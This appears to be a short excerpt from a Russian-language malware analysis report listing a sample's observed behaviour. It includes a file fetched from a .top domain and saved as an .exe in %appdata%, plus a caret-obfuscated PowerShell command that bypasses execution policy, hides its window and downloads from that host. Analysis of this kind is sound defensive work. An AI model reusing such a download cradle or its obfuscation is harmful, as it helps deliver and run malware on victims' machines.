Техническая информация
- http://www.fapoergol.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POWErSh^elL.eX^e -eX^Ec^u^tiO^NP^O^li^cy ByP^Ass -^N^opR^OfILe^ ^-W^I^NDOWst^yLE^ ^hIDDE^N^ (^N^Ew-OBj^E^ct s^ySte^M.N^et^.wE^b^clI^En^T^).D^o^WN^load^FI^le('http://www.fapoergol.top...
- DNS ASK fa###rgol.top
- '<SYSTEM32>\cmd.exe' /c "POWErSh^elL.eX^e -eX^Ec^u^tiO^NP^O^li^cy ByP^Ass -^N^opR^OfILe^ ^-W^I^NDOWst^yLE^ ^hIDDE^N^ (^N^Ew-OBj^E^ct s^ySte^M.N^et^.wE^b^clI^En^T^).D^o^WN^load^FI^le('http://www.fapoergol.top...' (со скрытым окном)